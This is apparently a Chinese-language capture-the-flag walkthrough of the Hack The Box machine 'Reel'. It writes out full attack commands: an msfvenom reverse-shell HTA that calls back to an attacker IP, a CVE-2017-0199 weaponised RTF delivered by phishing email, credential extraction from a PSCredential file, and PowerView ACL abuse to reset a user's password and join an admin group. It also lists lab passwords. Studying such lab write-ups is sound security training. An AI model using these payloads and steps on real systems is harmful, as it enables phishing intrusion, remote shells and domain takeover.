靶机ip:10.10.10.77

知识点

  • RTF钓鱼
  • ACL滥用-user-WriteOwner权限
  • ACL滥用-group-WriteDacl权限

信息收集

nmap扫描

1
nmap --min-rate 10000 -A -sV -sC -p- 10.10.10.77
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 13:44 CST
Nmap scan report for 10.10.10.77
Host is up (0.76s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): Microsoft Windows 7 (85%)
OS CPE: cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-10-27T05:48:32+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-10-27T05:48:28
|_ start_date: 2024-10-27T05:35:31
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
|_clock-skew: mean: 2s, deviation: 3s, median: 0s

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 644.73 ms 10.10.16.1
2 961.24 ms 10.10.10.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.65 seconds

开放21,22,25等若干端口,同时通过脚本扫描结果可知,该域名是REEL.HTB.LOCALHTB.LOCAL,将其添加到/etc/hosts文件中

image-20241027135319436

FTP

从扫描结果可知,ftp是允许匿名登录的

1
ftp anonymous@10.10.10.77

image-20241027135528981

发现三个文件,全部下载下来

1
2
prompt off
mget *

image-20241027135721726

全部查看一下

  • readme.txt

image-20241027135937958

发现是要使用邮件发送rtf格式的文件,并且文档都会保存到这里

  • AppLocker.docx

image-20241027140115107

  • Windows Event Forwarding.docx

image-20241027140533430

打开后发现文件已经损坏,使用exiftool 检查数据

1
exiftool Windows\ Event\ Forwarding.docx

image-20241027140724359

找到了个邮箱nico@megabank.com

RTF钓鱼

漏洞链接:CVE-2017-0199

使用msfvenom生成一个HTA文件

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=8888 -f hta-psh -o shell.hta

image-20241027142446919

使用CVE-2017-0199中的脚本创建一个RTF文件

1
python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w shell.rtf -u http://10.10.16.4/shell.hta -t rtf -x 0

image-20241027142909573

先启动一个http服务,在准备一个nc监听

image-20241027143031493

image-20241027143039426

使用sendemail 发送邮件

1
sendEmail -f root@admin.com -t nico@megabank.com -u "look me" -m "click me" -a shell.rtf -s 10.10.10.77 -v

image-20241027143936622

大约等待30s左右,就获得到shell了

image-20241027144229331

找到user.txt

nico -> Tom

nico桌面上发现还有个cred.xml,查看一下

image-20241027144604507

发现是tom的用户名和密码

可以使用PowershellPSCredential,它提供了一种存储用户名、密码和凭据的方法。还有两个函数Import-CliXmlExport-CliXml ,用于将这些凭据保存到文件中以及从文件中恢复它们。

使用Import-CliXml加载文件来获取明文密码

1
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

image-20241027145026052

获取到Tom用户的明文密码1ts-mag1c!!!

尝试使用ssh登录

1
ssh tom@10.10.10.77

image-20241027145335727

AD Privesc

image-20241027145615560

注意到桌面上有个AD Audit目录

image-20241027145703246

先查看一下note.txt

image-20241027145802362

查看一下其他文件

image-20241027150319779

结合提示并实践后发现,运行不了SharpHound.exe,无法使用Bloodhound进行信息收集,所以我们目标放在acls.csv

使用scp将文件下载下来

1
scp Tom@10.10.10.77:'/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/acls.csv' ./

image-20241027150855646

image-20241027151054397

是一个ACL的文件,分析一下,先对PrincipalName简单筛选一下Tom

image-20241027151302192

发现TomclaireWriteOwner权限,在搜索一下claire

image-20241027151756078

发现claireBackup_Admins组有WriteDacl权限

Tom->claire

注意到之前在tom机器上有PowerView.ps1

所以我们使用WriteOwner权限和PowerView.ps1的功能来登录claire

需要执行以下步骤:

  • 成为claire的ACL的所有者
  • 获取该ACL权限
  • 使用权限更改密码

先导入PowerView.ps1

1
. .\PowerView.ps1

image-20241027152935704

先把Tom设置成为claire的ACL的所有者

1
Set-DomainObjectOwner -identity claire -OwnerIdentity tom

给予Tom更改ACL上密码的权限

1
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

最后创建一个密码,然后给claire

1
2
$pass = ConvertTo-SecureString "Aa123456!" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $pass

image-20241027154431882

然后就可以通过ssh登录claire用户

image-20241027154517959

claire->Backup_Admins

之前的ACL分析可知claireBackup_Admins组有WriteDacl权限,可以用它将claire加入该组

先查看一下Backup_Admins

1
net group backup_admins

image-20241027155026424

当前用户只有ranj

现在添加claire

1
net group backup_admins claire /add

image-20241027155113754

再查看一下Backup_Admins

1
net group backup_admins

image-20241027155141343

发现已经claireBackup_Admins组中了,重新登录使其生效

ps: 重新登陆没有成功的,需要在执行一遍 Tom->claire 的操作

Backup_Admins->Administrator

目前我们以claire身份登录,并是Backup_Admins组的成员

说明我们有查看Administrator文件的权限

image-20241027160442280

找到root.txt,但是我们没权限查看,注意到有个Backuo Scripts目录,查看一下

image-20241027160630997

image-20241027160741004

最后在BackupScript.ps1文件中找到Admin的密码Cr4ckMeIfYouC4n!

ssh登录

1
ssh Administrator@10.10.10.77

image-20241027161033587

image-20241027161106839

最终找到root.txt